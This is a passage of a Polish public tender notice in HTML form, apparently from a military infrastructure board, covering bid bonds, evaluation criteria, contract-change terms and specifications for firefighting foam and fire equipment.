(jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o ile nie wynika ono z przepisów prawa lub innych dokumentów,?	w przypadku podpisania oferty i opatrzenia dokumentów klauzulą za zgodność z oryginałem przez osobę inną niż wymieniona w dokumencie rejestrowym, a reprezentującą Wykonawcę.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Wadium wynosi:Dla zadania nr 1 - 320,00 PLN (słownie: trzysta dwadzieścia złotych);Dla zadania nr 2 - 4 760,00PLN (słownie: cztery tysiące siedemset sześćdziesiąt złotych);W przypadku składania oferty na więcej niż jedną część, wartość wadium musi być sumą wartości wadium części na które Wykonawca składa ofertę.a)	Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami Rozdziału IX i może być wniesione w formach określonych w art. 45 ustawy.b)	W przypadku wniesienia wadium w formie pieniężnej, należy je wnieść przelewem na konto Wojskowego Zarządu Infrastruktury: NBP O/O POZNAŃ NR 791010 1469 0048 4813 9120 0000, które jest kontem nie oprocentowanym.	c)	Termin wniesienia wadium: do dnia 21.06.2017 r. - wadium musi być wniesione przed upływem terminu składania ofert (art. 45 ust. 3 ustawy PZP).UWAGA !!! Przez ,,wniesienie wadium" Zamawiający przyjmuje zaksięgowanie przelewu na jego rachunku bankowym. W przypadku polecenia przelewu niezaksięgowanego przez bank , wadium uznaje się za nie wniesione.2.	W przypadku wniesienia wadium w formie innej niż pieniężna oryginał gwarancji lub innego dokumentu należy przesłać (złożyć) za pismem przewodnim z podaniem nazwy przetargu do kancelarii WZI (pok. 5 w godz. od 7.30 - 11.30 oraz w godz. od 12.30 -14.30) kserokopię potwierdzającą wniesienie wadium należy załączyć do oferty.3.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana.4.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zamawiający zwraca wadium niezwłocznie po zawarciu umowy oraz uprzednim wniesieniu zabezpieczenia należytego wykonania umowy.5.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je w wysokości nominalnej na rachunek bankowy wskazany przez Wykonawcę6.	Zamawiający zatrzyma wadium zgodnie z treścią art. 46 ust 4a i 5 ustawy Prawo Zamówień Publicznych.7. Z treści wadium winno wynikać bezwarunkowe, na każde pisemne żądnie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust 4a oraz 5 ustawy Pzp.8.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin realizacji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">3.	Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy wyłącznie z tytułu okoliczności niemożliwych wcześniej do przewidzenia w zakresie:4/5a.	terminu wykonania zamówienia - w przypadku, gdy w szczególności zmiana terminu wynika z uzasadnionego wniosku Użytkownika obiektu, który z racjonalnych powodów zawnioskuje o przesunięcie termin realizacji umowy lub zmiany harmonogramu, przy czym wniosek taki winien uzasadniać ważny interes RP. Zmiana terminu może wynikać także z tytułu wystąpienia warunków atmosferycznych (lub przedłużających się procedur uzyskania niezbędnych zezwoleń administracyjnych) uniemożliwiających zachowanie właściwego reżimu lub parametrów realizacji umowy lub wystąpienia prac dodatkowych warunkujących wykonanie przedmiotu zamówienia.b.	zmiany w zakresie zaoferowanych materiałów i urządzeń itp. - w przypadku gdy w szczególności w trakcie realizacji umowy nastąpi wycofanie z produkcji materiałów, urządzeń itp. a wprowadzenie substytutów nie spowoduje zmiany parametrów przedmiotu zamówienia, - do .......% wartości użytych materiałów,c.	zmiany ceny jednostkowej wynagrodzenia - w przypadku, gdy w szczególności w trakcie realizacji umowy nastąpi zmiana podatku VAT, zawarta umowa zastrzega waloryzację świadczeń lub indeksację cen,d.	zmiany w zakresie osób reprezentujących strony umowy - w szczególności w sytuacjach losowych lub zmian organizacyjnych,e.	zakres realizacji umowy - w szczególności w przypadku gdy Zamawiającemu ograniczono (w trakcie roku finansowego) środki finansowe na realizację zleconych mu zadań, wyłączenia obiektu, urządzenia z użytkowania lub jego likwidacji, konieczności wykonania prac zamiennych - do .......% wartości umowy,f.	zmiany w zakresie wskazanych dla realizacji umowy podwykonawców - w przypadku gdy w szczególności podwykonawca wadliwie wykonuje powierzone mu prace, zaprzestał ich wykonywania lub w razie jego upadłości (likwidacji)</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-06-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa środka pianotwórczego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>środek pianotwórczy syntetyczny 3% : - do gaszenia pożarów klasy A i B, - do wytwarzania piany ciężkiej, średniej i lekkiej, - wartość pH 7,5? 0,5,gęstość przy 20°C -1,2?0,02 kg/dcm, - lepkość przy 20°C maks. 10 mm, przy 0°C maks. 50 mm, przy - 15°C maks. 200mm, - mrozoodporność -10°C, - obszary zastosowania: we wszystkich instalacjach i urządzeniach do wytwarzania piany ciężkiej, średniej i lekkiej, .- środek powinien być nieszkodliwy po względem fizjologicznym i biologicznie - dobrze degradowany,- gwarancja minimum 60 miesięcy- rok produkcji 2017- wymagane świadectwo dopuszczenia CNBOP .<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>35811100-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 12804,0<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 30<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin realizacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa sprzętu pożarniczego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ II ,,Dostawa sprzętu pożarniczego"- agregat oddymiający:- moc ok. 4,4 kW (6,0 KM)/3600 obr/min - silnik czterosuwowy, górnozaworowy OHC, chłodzony powietrzem na benzynę bezołowiową 95,- zapłon elektroniczny,- rozruch rewersyjny linką - łopatki wentylatora powinny być wykonane z trwałego tworzywa np. poliamid zbrojony włóknem szklanym lub równoważne- wyważenie dynamiczne wentylatora w klasie G6.3 zgodnie z normą PN-N011359:1993- stalowa rama powinna być powleczona farbą proszkową.- do agregatu należy dołączyć jako opcje - wąż do odprowadzania spalin.- a także Instrukcję obsługi w jęz. polskim,- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- akumulatorek R6 2100mAh, 1,2 V- rok produkcji - 2017,- gwarancja minimum 24 miesiące. - akumulatorek 6F22 200mAh, 9V - rok produkcji - 2017,- gwarancja minimum 24 miesiące.- bosak podręczny, teleskopowy dł. 4 m lub większa:- aluminiowo - plastikowy do rozpinania zamków gondoli silników samolotowych- rok produkcji - 2017- gwarancja minimum - 24 miesiące - hydronetka plecakowa;- dwuwarstwowa hydronetka plecakowa z PCV o poj. 25 l wyposażona w prądownice pistoletową umożliwiająca wyrzut wody na ok. 8 m,- na ramionach i na pasie biodrowym powinna posiadać miękkie wkładki- kolor żółty- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- kanister -kombi przeźroczysty w kolorze pomarańczowym.- do transportu 5 l paliwa i 3 l oleju do pił łańcuchowych- powinien być wyposażony w zabezpieczenia wlewów np. przed dziećmi- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- kurtyna wodna ? 52 z regulacją:- możliwość płynnej regulacji wydajności, szerokości i wysokości strumienia za pomocą obrotu dźwigni.- materiały: aluminium PA6 i mosiądz M058, uszczelki - guma, - nasada - odlew aluminiowy ze stopu AK 11 (AlSi 11)- dane techniczne: nasada wyjścia: ?52- waga: 2 ?0,10 kg- wydajność: 800 l/min- wysokość kurtyny przy ciśnieniu 5 bar: 8 m- szerokość: 24 m- rok produkcji - 2017,- gwarancja minimum 24 miesiące- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- kurtyna wodna ? 75 z regulacją:- możliwość płynnej regulacji wydajności, szerokości i wysokości strumienia za pomocą obrotu dźwigni.- materiały: aluminium PA6 i mosiądz M058, uszczelki - guma, - nasada - odlew aluminiowy ze stopu AK 11 (AlSi 11)- dane techniczne: nasada wyjścia: ?75- waga: 2,45 ?0,10 kg o	- przepływ: 5 bar - 1400 l/min, 8bar - 1800 l/mino	- wysokość rzutu: 5 bar - 9,5 m, 8 bar - 10,5m- szerokość rzutu: 5 bar - 25 m, 8 bar -28 m,- rok produkcji - 2017,- gwarancja minimum 24 miesiące- wymagane ,,świadectwo dopuszczenia CNBOP-PIB".- latarka akumulatorowa typu LED - system Ex:Akumulatorowa latarka typu szperacz w wykonaniu antywybuchowym Ex z funkcją światła awaryjnego:- przeznaczenie do strefy 1 gazowej i pyłowej (strefa gazowa 1,2, strefa pyłowa 21, 22);- źródło światła 3x Cree Led ze specjalną optyką, - żywotność do +/- 50 tys. godzin;- klosz ze specjalnego, odpornego na uderzenia szkła o grubości +/-5 mm;- obudowa z ekstremalnie wytrzymałego polipropylenu odpornego na uderzenia, wstrząsy, wodę i czynniki chemiczne;- moc światła 200 lm;- temperatura pracy - 200 do + 400 C;- bateria o długiej żywotności zapewniająca czas pracy ciągłej minimum 6 na pełnej mocy 12 h przy mocy zredukowanej i miganiu;- zabezpieczenie przed głębokim rozładowaniem baterii;- ostrzeżenie o niskim stanie baterii;- pas do latarki na ramię z możliwością podczepienia latarki na pasie strażackim lub ubraniu specjalnym;- funkcja EM (światło awaryjne) latarka umieszczona w ładowarce samoczynnie zapala się w przypadku zaniku zasilania;- uchwyt chroniący dłoń ratownika w trakcie przemieszczania się na czworaka i podczas czołgania się po nieprzyjaznym podłożu;- z dużym przełącznikiem umożliwiającym pracę w rękawicach roboczych;- kilka trybów światła;- wyposażona w uniwersalną ładowarkę 12-24VDC/230VAC, którą można instalować w pozycji poziomej jak i pionowej;- z latarką powinny być dostarczone wszystkie wymagane certyfikaty, instrukcje obsługi - gwarancja minimum 24 miesiące.- ładowarka akumulatorków R3, R6 i 9V- łańcuch do piły łańcuchowej, spalinowej STIHL lub równorzędnej 3,8", 50 cm- powinien posiadać Kartę katalogową,- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- miernik wielogazowy z ładowarką:Z akumulatorem litowo - polimerowym z czasem pracy 24 godz. przy pełnej baterii;Obudowa powinna spełniać współczynnik ochrony IP67 i być także odporna na przenikanie wody i kurzuMiernik powinien mieć zastosowanie do mierzenia stężeń gazów:gazy palne DGW, tlen O2, tlenek węgla CO, siarkowodór H2S, dwutlenek siarki SO2, dwutlenek azotu NO2;- powinien być wyposażony w wskaźnik zużycia czujników.- nóż do przecinania taśm i pasów:- pilarka spalinowa do drewna;- silnik 2-MIX z systemem M-Tronic- moc 2,3 kW/3,1 KM,- podziałka piły łańcuchowej 3/8" - prowadnica do łańcucha piły spalinowej typ 026, 35cm/14, 3,8 cal lub równorzędna:- kompatybilna z piłą STIHL MS 290, która jest na wyposażeniu WSP,- powinna posiadać Kartę katalogową,- rok produkcji - 2017,- gwarancja minimum 24 miesiące.- przełącznik ?125/110- system Storz,- oprawy zewnętrzna i wewnętrzna powinny być z aluminium,- uszczelki z gumy,- wkręt dociskowy powinien być ocynkowany- rok produkcji - 2017,- gwarancja 